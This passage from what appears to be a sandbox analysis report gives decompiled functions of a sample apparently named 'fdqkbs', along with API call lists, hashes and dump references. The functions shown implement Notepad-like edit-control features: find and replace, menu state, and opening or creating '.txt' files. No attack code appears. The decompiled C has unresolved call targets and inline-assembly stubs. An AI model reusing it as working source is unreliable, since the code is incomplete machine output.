                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menulstrlen$CheckItemLoadStringlstrcpy$ShowWindow
                                                                                  • String ID: *.*$*.txt
                                                                                  • API String ID: 3918228958-3257935098
                                                                                  • Opcode ID: 75e06e0688ce5136c08f1be010525f00f6fa6f4c30b6f453ae9aaa2372dfe8a2
                                                                                  • Instruction ID: 572a540fb6504921a5b5a71d4603651758fe767a8bf175bd1912394847e7168a
                                                                                  • Opcode Fuzzy Hash: 75e06e0688ce5136c08f1be010525f00f6fa6f4c30b6f453ae9aaa2372dfe8a2
                                                                                  • Instruction Fuzzy Hash: 56118132590629BBD7016B78EC4ADEA3B7DEB88711B05C432F101E71B0D7B95881CF68
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 77%
                                                                                  			E00401E09(intOrPtr _a4) {
                                                                                  				void* _v8;
                                                                                  				signed int _v12;
                                                                                  				int _v16;
                                                                                  				void* _t27;
                                                                                  				void* _t33;
                                                                                  				int _t38;
                                                                                  				void* _t44;
                                                                                  				int _t50;
                                                                                  				intOrPtr _t51;
                                                                                  
                                                                                  				_v16 = lstrlenW( *(_a4 + 0x10));
                                                                                  				SendMessageW( *0x415f6c, 0xb1, 0, 0);
                                                                                  				_t4 = GetWindowTextLengthW( *0x415f6c) + 1; // 0x1
                                                                                  				_t50 = _t4;
                                                                                  				_push(_t50 + _t50);
                                                                                  				_push(0);
                                                                                  				while(1) {
                                                                                  					_t27 = HeapAlloc(GetProcessHeap(), ??, ??);
                                                                                  					_v12 = _t27;
                                                                                  					if(_t27 == 0) {
                                                                                  						break;
                                                                                  					}
                                                                                  					GetWindowTextW( *0x415f6c, _v12, _t50);
                                                                                  					SendMessageW( *0x415f6c, 0xb0, 0,  &_v8);
                                                                                  					_t51 = _a4;
                                                                                  					_t33 = ( *(_t51 + 0xc) & 0x00000005) - 1;
                                                                                  					if(_t33 == 0) {
                                                                                  						L3:
                                                                                  						if(_v8 ==  ~_v12) {
                                                                                  							_v8 = _v8 | 0xffffffff;
                                                                                  						}
                                                                                  						HeapFree(GetProcessHeap(), 0, _v12);
                                                                                  						_t38 = _v8;
                                                                                  						if(_t38 == 0xffffffff) {
                                                                                  							return SendMessageW( *0x415f6c, 0xb1, 0, 0);
                                                                                  						}
                                                                                  						SendMessageW( *0x415f6c, 0xb1, _t38, _v16 + _t38);
                                                                                  						SendMessageW( *0x415f6c, 0xc2, 1,  *(_t51 + 0x14));
                                                                                  						_t18 = GetWindowTextLengthW( *0x415f6c) + 1; // 0x1
                                                                                  						_t50 = _t18;
                                                                                  						_push(_t50 + _t50);
                                                                                  						_push(0);
                                                                                  						continue;
                                                                                  					}
                                                                                  					_t44 = _t33 - 4;
                                                                                  					if(_t44 == 0) {
                                                                                  						goto L3;
                                                                                  					}
                                                                                  					return _t44;
                                                                                  				}
                                                                                  				return _t27;
                                                                                  			}












                                                                                  0x00401e33
                                                                                  0x00401e36
                                                                                  0x00401e44
                                                                                  0x00401e44
                                                                                  0x00401e4a
                                                                                  0x00401e4b
                                                                                  0x00401eee
                                                                                  0x00401ef1
                                                                                  0x00401ef7
                                                                                  0x00401efc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00401e61
                                                                                  0x00401e78
                                                                                  0x00401e7a
                                                                                  0x00401e83
                                                                                  0x00401e84
                                                                                  0x00401e8f
                                                                                  0x00401e97
                                                                                  0x00401e99
                                                                                  0x00401e99
                                                                                  0x00401ea5
                                                                                  0x00401eab
                                                                                  0x00401eb1
                                                                                  0x00000000
                                                                                  0x00401f13
                                                                                  0x00401ec5
                                                                                  0x00401ed7
                                                                                  0x00401ee5
                                                                                  0x00401ee5
                                                                                  0x00401eeb
                                                                                  0x00401eec
                                                                                  0x00000000
                                                                                  0x00401eec
                                                                                  0x00401e86
                                                                                  0x00401e89
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00401f19
                                                                                  0x00401f19
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(?), ref: 00401E18
                                                                                  • SendMessageW.USER32(000000B1,00000000,00000000), ref: 00401E36
                                                                                  • GetWindowTextLengthW.USER32 ref: 00401E3E
                                                                                  • GetWindowTextW.USER32 ref: 00401E61
                                                                                  • SendMessageW.USER32(000000B0,00000000,?), ref: 00401E78
                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00401EA2
                                                                                  • HeapFree.KERNEL32(00000000), ref: 00401EA5
                                                                                  • SendMessageW.USER32(000000B1,?,?), ref: 00401EC5
                                                                                  • SendMessageW.USER32(000000C2,00000001,?), ref: 00401ED7
                                                                                  • GetWindowTextLengthW.USER32 ref: 00401EDF
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401EEE
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00401EF1
                                                                                  • SendMessageW.USER32(000000B1,00000000,00000000), ref: 00401F13
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Heap$TextWindow$LengthProcess$AllocFreelstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 1498816615-0
                                                                                  • Opcode ID: 48ec3bf0ab5ab7a8601c70e7cea4bf8902e51d03c3d1ad19201b7ebe05fdb5df
                                                                                  • Instruction ID: ce49090e5d19a19af0320e951ed4d397d30ac25977f929a6b7e329fcc34971d6
                                                                                  • Opcode Fuzzy Hash: 48ec3bf0ab5ab7a8601c70e7cea4bf8902e51d03c3d1ad19201b7ebe05fdb5df
                                                                                  • Instruction Fuzzy Hash: 57313A31A00609FFDB119BA0EC89FEE7B79EB88314F108031F941A61B0C7B5AD559B28
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 89%
                                                                                  			E00401C3A(WCHAR* _a4) {
                                                                                  				void* _v8;
                                                                                  				int _v12;
                                                                                  				WCHAR* _v16;
                                                                                  				void* _t28;
                                                                                  				signed int _t34;
                                                                                  				WCHAR* _t42;
                                                                                  				void* _t43;
                                                                                  				void* _t44;
                                                                                  				WCHAR* _t45;
                                                                                  				void* _t48;
                                                                                  				WCHAR* _t49;
                                                                                  				signed int _t53;
                                                                                  				int _t55;
                                                                                  				WCHAR* _t56;
                                                                                  
                                                                                  				_v12 = lstrlenW(_a4[8]);
                                                                                  				_t4 = GetWindowTextLengthW( *0x415f6c) + 1; // 0x1
                                                                                  				_t55 = _t4;
                                                                                  				_t28 = HeapAlloc(GetProcessHeap(), 0, _t55 + _t55);
                                                                                  				_t48 = _t28;
                                                                                  				if(_t48 != 0) {
                                                                                  					GetWindowTextW( *0x415f6c, _t48, _t55);
                                                                                  					SendMessageW( *0x415f6c, 0xb0, 0,  &_v8);
                                                                                  					_t49 = _a4;
                                                                                  					_t34 =  *(_t49 + 0xc) & 0x00000005;
                                                                                  					if(_t34 == 0) {
                                                                                  						L5:
                                                                                  						_t56 = _a4;
                                                                                  						L6:
                                                                                  						_v8 = _t56 - _t48 >> 1;
                                                                                  						HeapFree(GetProcessHeap(), 0, _t48);
                                                                                  						if(_t56 != 0) {
                                                                                  							return SendMessageW( *0x415f6c, 0xb1, _v8, _v12 + _v8);
                                                                                  						}
                                                                                  						_t42 = _a4;
                                                                                  						0x400000( *0x415f68, 0x17b, _t42[8], 0x40);
                                                                                  						return _t42;
                                                                                  					}
                                                                                  					_t43 = _t34 - 1;
                                                                                  					if(_t43 == 0) {
                                                                                  						goto L5;
                                                                                  					}
                                                                                  					_t44 = _t43 - 3;
                                                                                  					if(_t44 == 0) {
                                                                                  						_t45 =  *(_t49 + 0x10);
                                                                                  						_t53 = _v8 - _v12;
                                                                                  						_v16 = _t45;
                                                                                  						_t18 = _t53 * 2; // -2
                                                                                  						_t56 = _t48 + _t18 - 2;
                                                                                  						lstrlenW(_t45);
                                                                                  						while(_t56 >= _t48) {
                                                                                  							if(lstrcmpW(_t56, _v16) == 0) {
                                                                                  								goto L6;
                                                                                  							}
                                                                                  							_t56 = _t56 - 2;
                                                                                  						}
                                                                                  						_t56 = 0;
                                                                                  						goto L6;
                                                                                  					}
                                                                                  					_t28 = _t44 - 1;
                                                                                  					if(_t28 == 0) {
                                                                                  						goto L5;
                                                                                  					}
                                                                                  				}
                                                                                  				return _t28;
                                                                                  			}

















                                                                                  0x00401c57
                                                                                  0x00401c60
                                                                                  0x00401c60
                                                                                  0x00401c70
                                                                                  0x00401c76
                                                                                  0x00401c7a
                                                                                  0x00401c88
                                                                                  0x00401c9f
                                                                                  0x00401ca5
                                                                                  0x00401cae
                                                                                  0x00401cb1
                                                                                  0x00401cc2
                                                                                  0x00401cc2
                                                                                  0x00401cc5
                                                                                  0x00401cce
                                                                                  0x00401cd8
                                                                                  0x00401ce0
                                                                                  0x00000000
                                                                                  0x00401d3f
                                                                                  0x00401ce2
                                                                                  0x00401cf5
                                                                                  0x00000000
                                                                                  0x00401cf5
                                                                                  0x00401cb3
                                                                                  0x00401cb4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00401cb6
                                                                                  0x00401cb9
                                                                                  0x00401cfc
                                                                                  0x00401d02
                                                                                  0x00401d06
                                                                                  0x00401d09
                                                                                  0x00401d09
                                                                                  0x00401d0d
                                                                                  0x00401d22
                                                                                  0x00401d1d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00401d1f
                                                                                  0x00401d1f
                                                                                  0x00401d26
                                                                                  0x00000000
                                                                                  0x00401d26
                                                                                  0x00401cbb
                                                                                  0x00401cbc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00401cbc
                                                                                  0x00401d49

                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(?), ref: 00401C4F
                                                                                  • GetWindowTextLengthW.USER32 ref: 00401C5A
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401C69
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00401C70
                                                                                  • GetWindowTextW.USER32 ref: 00401C88
                                                                                  • SendMessageW.USER32(000000B0,00000000,?), ref: 00401C9F
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401CD1
                                                                                  • HeapFree.KERNEL32(00000000), ref: 00401CD8
                                                                                  • lstrlenW.KERNEL32(?), ref: 00401D0D
                                                                                  • lstrcmpW.KERNEL32(-00000002,?), ref: 00401D15
                                                                                  • SendMessageW.USER32(000000B1,?,?), ref: 00401D3F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$MessageProcessSendTextWindowlstrlen$AllocFreeLengthlstrcmp
                                                                                  • String ID:
                                                                                  • API String ID: 302198436-0
                                                                                  • Opcode ID: cc72cb58a21e2fb17c5fff7b8e4ed7f1f6b45f72a17095162b12c3208c8c986d
                                                                                  • Instruction ID: 738a3a3d88226cada9937fa8338a0d395f6bf2963d328e57f9c5620f5e592caa
                                                                                  • Opcode Fuzzy Hash: cc72cb58a21e2fb17c5fff7b8e4ed7f1f6b45f72a17095162b12c3208c8c986d
                                                                                  • Instruction Fuzzy Hash: 95312D76A40208EFDB119FA4EC48FDE7B68EB48304F158075FA05AB2A0DB75AD41DB58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00401D4C(WCHAR* __edi) {
                                                                                  				void* _v8;
                                                                                  				void* _v12;
                                                                                  				int _v16;
                                                                                  				void* _t19;
                                                                                  				void* _t26;
                                                                                  				signed int _t27;
                                                                                  				void* _t34;
                                                                                  				WCHAR* _t37;
                                                                                  				int _t38;
                                                                                  
                                                                                  				_t37 = __edi;
                                                                                  				_v16 = lstrlenW( *(__edi + 0x10));
                                                                                  				_t3 = GetWindowTextLengthW( *0x415f6c) + 1; // 0x1
                                                                                  				_t38 = _t3;
                                                                                  				_t19 = HeapAlloc(GetProcessHeap(), 0, _t38 + _t38);
                                                                                  				_t34 = _t19;
                                                                                  				if(_t34 != 0) {
                                                                                  					GetWindowTextW( *0x415f6c, _t34, _t38);
                                                                                  					SendMessageW( *0x415f6c, 0xb0,  &_v12,  &_v8);
                                                                                  					_t26 = ( *(__edi + 0xc) & 0x00000005) - 1;
                                                                                  					if(_t26 == 0) {
                                                                                  						L3:
                                                                                  						_t27 = _v12;
                                                                                  						if(_v8 - _t27 == _v16 && lstrcmpW( *(_t37 + 0x10), _t34 + _t27 * 2) == 0) {
                                                                                  							SendMessageW( *0x415f6c, 0xc2, 1,  *(_t37 + 0x14));
                                                                                  						}
                                                                                  						HeapFree(GetProcessHeap(), 0, _t34);
                                                                                  						return E00401C3A(_t37);
                                                                                  					}
                                                                                  					_t19 = _t26 - 4;
                                                                                  					if(_t19 == 0) {
                                                                                  						goto L3;
                                                                                  					}
                                                                                  				}
                                                                                  				return _t19;
                                                                                  			}












                                                                                  0x00401d4c
                                                                                  0x00401d63
                                                                                  0x00401d6c
                                                                                  0x00401d6c
                                                                                  0x00401d7c
                                                                                  0x00401d82
                                                                                  0x00401d86
                                                                                  0x00401d90
                                                                                  0x00401daf
                                                                                  0x00401db7
                                                                                  0x00401db8
                                                                                  0x00401dbf
                                                                                  0x00401dbf
                                                                                  0x00401dca
                                                                                  0x00401ded
                                                                                  0x00401ded
                                                                                  0x00401df9
                                                                                  0x00000000
                                                                                  0x00401e00
                                                                                  0x00401dba
                                                                                  0x00401dbd
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00401dbd
                                                                                  0x00401e08

                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(?), ref: 00401D57
                                                                                  • GetWindowTextLengthW.USER32 ref: 00401D66
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401D75
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00401D7C
                                                                                  • GetWindowTextW.USER32 ref: 00401D90
                                                                                  • SendMessageW.USER32(000000B0,?,?), ref: 00401DAF
                                                                                  • lstrcmpW.KERNEL32(?,?), ref: 00401DD3
                                                                                  • SendMessageW.USER32(000000C2,00000001,?), ref: 00401DED
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401DF2
                                                                                  • HeapFree.KERNEL32(00000000), ref: 00401DF9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$MessageProcessSendTextWindow$AllocFreeLengthlstrcmplstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 276103653-0
                                                                                  • Opcode ID: 73957ffef09ac0703d59bfb5c25fef60643b5419a745646a960d329f4784b7a4
                                                                                  • Instruction ID: 8ca4d24a7fc5045a5f5655c77c8d62678ef15db99f04df4acbda4ba5258b7913
                                                                                  • Opcode Fuzzy Hash: 73957ffef09ac0703d59bfb5c25fef60643b5419a745646a960d329f4784b7a4
                                                                                  • Instruction Fuzzy Hash: 3211FE31A00609FFDB11AFA4EC88EDE7F79FF08345F008076F545A2160DB75A9948B68
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 71%
                                                                                  			E00401B9F(struct HMENU__* __ebx) {
                                                                                  				signed int _t3;
                                                                                  				signed int _t7;
                                                                                  				signed int _t15;
                                                                                  				int _t25;
                                                                                  
                                                                                  				_t3 = SendMessageW( *0x415f6c, 0xc6, 0, 0);
                                                                                  				asm("sbb eax, eax");
                                                                                  				EnableMenuItem(__ebx, 0x110,  ~_t3 + 1);
                                                                                  				_t7 = IsClipboardFormatAvailable(1);
                                                                                  				asm("sbb eax, eax");
                                                                                  				EnableMenuItem(__ebx, 0x113,  ~_t7 + 1);
                                                                                  				_t25 = 0 | SendMessageW( *0x415f6c, 0xb0, 0, 0) >> 0x00000010 == _t11;
                                                                                  				EnableMenuItem(__ebx, 0x111, _t25);
                                                                                  				EnableMenuItem(__ebx, 0x112, _t25);
                                                                                  				EnableMenuItem(__ebx, 0x114, _t25);
                                                                                  				_t15 = GetWindowTextLengthW( *0x415f6c);
                                                                                  				asm("sbb eax, eax");
                                                                                  				return EnableMenuItem(__ebx, 0x116,  ~_t15 + 1);
                                                                                  			}







                                                                                  0x00401bb6
                                                                                  0x00401bc0
                                                                                  0x00401bca
                                                                                  0x00401bce
                                                                                  0x00401bd6
                                                                                  0x00401be0
                                                                                  0x00401c00
                                                                                  0x00401c09
                                                                                  0x00401c12
                                                                                  0x00401c1b
                                                                                  0x00401c23
                                                                                  0x00401c2b
                                                                                  0x00401c39

                                                                                  APIs
                                                                                  • SendMessageW.USER32(000000C6,00000000,00000000), ref: 00401BB6
                                                                                  • EnableMenuItem.USER32 ref: 00401BCA
                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 00401BCE
                                                                                  • EnableMenuItem.USER32 ref: 00401BE0
                                                                                  • SendMessageW.USER32(000000B0,00000000,00000000), ref: 00401BF1
                                                                                  • EnableMenuItem.USER32 ref: 00401C09
                                                                                  • EnableMenuItem.USER32 ref: 00401C12
                                                                                  • EnableMenuItem.USER32 ref: 00401C1B
                                                                                  • GetWindowTextLengthW.USER32 ref: 00401C23
                                                                                  • EnableMenuItem.USER32 ref: 00401C35
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnableItemMenu$MessageSend$AvailableClipboardFormatLengthTextWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2096502293-0
                                                                                  • Opcode ID: d73bab931a6c4aa741f3144eb11f6fe7fc513639e33c67cb141d44b45079a633
                                                                                  • Instruction ID: 3a30abc31a22bbec39353dc46f3e4c67e205073161841612e8df996d8f39c960
                                                                                  • Opcode Fuzzy Hash: d73bab931a6c4aa741f3144eb11f6fe7fc513639e33c67cb141d44b45079a633
                                                                                  • Instruction Fuzzy Hash: 73014B71BD02187AF6242B36AC4BFFB2D1DDB81B51F148421B706EA0E2C9E558418964
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 55%
                                                                                  			E00401F93(WCHAR* __eax) {
                                                                                  				signed int _v8;
                                                                                  				short _v528;
                                                                                  				signed int _t17;
                                                                                  				signed int _t18;
                                                                                  				WCHAR* _t19;
                                                                                  				WCHAR* _t20;
                                                                                  				WCHAR* _t26;
                                                                                  				void* _t29;
                                                                                  				void* _t34;
                                                                                  				long _t35;
                                                                                  				signed int _t39;
                                                                                  				signed int _t40;
                                                                                  				signed int _t41;
                                                                                  				void* _t45;
                                                                                  				RECT* _t46;
                                                                                  				WCHAR* _t47;
                                                                                  				WCHAR* _t48;
                                                                                  
                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                  				_t35 = 2;
                                                                                  				_t48 = __eax;
                                                                                  				_t45 = 0x20;
                                                                                  				L2:
                                                                                  				if( *_t48 == _t45) {
                                                                                  					_t48 = _t48 + _t35;
                                                                                  					goto L2;
                                                                                  				}
                                                                                  				_t17 =  *_t48 & 0x0000ffff;
                                                                                  				_t39 = (0 | _t17 == 0x00000022) + (0 | _t17 == 0x00000022) + 0x00000020 & 0x0000ffff;
                                                                                  				if(_t17 == _t39) {
                                                                                  					_t48 = _t48 + _t35;
                                                                                  				}
                                                                                  				_t46 = 0;
                                                                                  				while(1) {
                                                                                  					_t18 =  *_t48 & 0x0000ffff;
                                                                                  					if(_t18 == _t46) {
                                                                                  						break;
                                                                                  					}
                                                                                  					if(_t18 == _t39) {
                                                                                  						L10:
                                                                                  						_t48 = _t48 + _t35;
                                                                                  						L11:
                                                                                  						if( *_t48 == _t45) {
                                                                                  							goto L10;
                                                                                  						}
                                                                                  						_t19 = _t48;
                                                                                  						while(1) {
                                                                                  							_t40 =  *_t19 & 0x0000ffff;
                                                                                  							if(_t40 != _t45 && _t40 != 0x2d && _t40 != 0x2f) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_t19 = _t19 + _t35;
                                                                                  							if(_t40 == _t45) {
                                                                                  								continue;
                                                                                  							}
                                                                                  							_t41 =  *_t19 & 0x0000ffff;
                                                                                  							if(_t41 == _t46) {
                                                                                  								L19:
                                                                                  								if( *_t19 == _t45) {
                                                                                  									goto L18;
                                                                                  								}
                                                                                  								if(_t41 == 0x50 || _t41 == 0x70) {
                                                                                  									if(_v8 == _t46) {
                                                                                  										_v8 = 1;
                                                                                  										_t48 = _t19;
                                                                                  									}
                                                                                  								}
                                                                                  								continue;
                                                                                  							}
                                                                                  							L18:
                                                                                  							_t19 = _t19 + _t35;
                                                                                  							goto L19;
                                                                                  						}
                                                                                  						_t20 =  *_t48 & 0x0000ffff;
                                                                                  						if(_t20 == _t46) {
                                                                                  							L41:
                                                                                  							return _t20;
                                                                                  						}
                                                                                  						if(_t20 != 0x22) {
                                                                                  							L30:
                                                                                  							0x400000(_t48);
                                                                                  							if(_t20 != 0) {
                                                                                  								L33:
                                                                                  								0x400000(_t48, 0xffffffff);
                                                                                  								_t20 = InvalidateRect( *0x415f64, _t46, _t46);
                                                                                  								if(_v8 == _t46) {
                                                                                  									goto L41;
                                                                                  								}
                                                                                  								0x400000();
                                                                                  								return _t20;
                                                                                  							}
                                                                                  							_t47 = L".txt";
                                                                                  							lstrcpynW( &_v528, _t48, 0x103 - lstrlenW(_t47));
                                                                                  							lstrcatW( &_v528, _t47);
                                                                                  							_t48 =  &_v528;
                                                                                  							_t26 = _t48;
                                                                                  							0x400000(_t26);
                                                                                  							if(_t26 == 0) {
                                                                                  								_t29 = E00401F1C( &_v528) - _t35;
                                                                                  								if(_t29 == 0) {
                                                                                  									return DestroyWindow( *0x415f64);
                                                                                  								}
                                                                                  								_t20 = _t29 - 4;
                                                                                  								if(_t20 != 0) {
                                                                                  									goto L41;
                                                                                  								}
                                                                                  								E0040101C( &_v528, 0);
                                                                                  								_t34 = CreateFileW( &_v528, 0x40000000, _t35, 0, 4, 0x80, 0);
                                                                                  								if(_t34 != 0xffffffff) {
                                                                                  									_t34 = CloseHandle(_t34);
                                                                                  								}
                                                                                  								0x400000();
                                                                                  								return _t34;
                                                                                  							}
                                                                                  							_t46 = 0;
                                                                                  							goto L33;
                                                                                  						}
                                                                                  						_t48 = _t48 + _t35;
                                                                                  						_t20 = _t48;
                                                                                  						if( *_t48 == _t46) {
                                                                                  							L29:
                                                                                  							 *_t20 = 0;
                                                                                  							goto L30;
                                                                                  						}
                                                                                  						while( *_t20 != 0x22) {
                                                                                  							_t20 = _t20 + _t35;
                                                                                  							if( *_t20 != _t46) {
                                                                                  								continue;
                                                                                  							}
                                                                                  							goto L29;
                                                                                  						}
                                                                                  						goto L29;
                                                                                  					}
                                                                                  					_t48 = _t48 + _t35;
                                                                                  				}
                                                                                  				if( *_t48 != _t39) {
                                                                                  					goto L11;
                                                                                  				}
                                                                                  				goto L10;
                                                                                  			}




















                                                                                  0x00401f9c
                                                                                  0x00401fa5
                                                                                  0x00401fa8
                                                                                  0x00401faa
                                                                                  0x00401faf
                                                                                  0x00401fb2
                                                                                  0x00401fad
                                                                                  0x00000000
                                                                                  0x00401fad
                                                                                  0x00401fb4
                                                                                  0x00401fc3
                                                                                  0x00401fc9
                                                                                  0x00401fcb
                                                                                  0x00401fcb
                                                                                  0x00401fcd
                                                                                  0x00401fd8
                                                                                  0x00401fd8
                                                                                  0x00401fde
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00401fd4
                                                                                  0x00401fe5
                                                                                  0x00401fe5
                                                                                  0x00401fe7
                                                                                  0x00401fea
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00401fec
                                                                                  0x00401fee
                                                                                  0x00401fee
                                                                                  0x00401ff4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00402000
                                                                                  0x00402005
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00402007
                                                                                  0x0040200d
                                                                                  0x00402011
                                                                                  0x00402014
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00402019
                                                                                  0x00402023
                                                                                  0x00402025
                                                                                  0x0040202c
                                                                                  0x0040202c
                                                                                  0x00402023
                                                                                  0x00000000
                                                                                  0x00402019
                                                                                  0x0040200f
                                                                                  0x0040200f
                                                                                  0x00000000
                                                                                  0x0040200f
                                                                                  0x00402030
                                                                                  0x00402036
                                                                                  0x0040212f
                                                                                  0x0040212f
                                                                                  0x0040212f
                                                                                  0x0040203f
                                                                                  0x0040205c
                                                                                  0x0040205d
                                                                                  0x00402064
                                                                                  0x004020aa
                                                                                  0x004020ad
                                                                                  0x004020ba
                                                                                  0x004020c3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004020c5
                                                                                  0x00000000
                                                                                  0x004020c5
                                                                                  0x00402066
                                                                                  0x00402082
                                                                                  0x00402090
                                                                                  0x00402096
                                                                                  0x0040209c
                                                                                  0x0040209f
                                                                                  0x004020a6
                                                                                  0x004020d8
                                                                                  0x004020da
                                                                                  0x00000000
                                                                                  0x00402125
                                                                                  0x004020dc
                                                                                  0x004020df
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004020eb
                                                                                  0x00402106
                                                                                  0x0040210f
                                                                                  0x00402112
                                                                                  0x00402112
                                                                                  0x00402118
                                                                                  0x00000000
                                                                                  0x00402118
                                                                                  0x004020a8
                                                                                  0x00000000
                                                                                  0x004020a8
                                                                                  0x00402041
                                                                                  0x00402043
                                                                                  0x00402048
                                                                                  0x00402057
                                                                                  0x00402059
                                                                                  0x00000000
                                                                                  0x00402059
                                                                                  0x0040204a
                                                                                  0x00402050
                                                                                  0x00402055
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00402055
                                                                                  0x00000000
                                                                                  0x0040204a
                                                                                  0x00401fd6
                                                                                  0x00401fd6
                                                                                  0x00401fe3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(.txt), ref: 0040206C
                                                                                  • lstrcpynW.KERNEL32(?,?,00000103), ref: 00402082
                                                                                  • lstrcatW.KERNEL32(?,.txt), ref: 00402090
                                                                                  • InvalidateRect.USER32(00000000,00000000,?,000000FF), ref: 004020BA
                                                                                  • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000,?,00000103), ref: 00402106
                                                                                  • CloseHandle.KERNEL32(00000000,?,00000103), ref: 00402112
                                                                                  • DestroyWindow.USER32(?,00000103), ref: 00402125
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
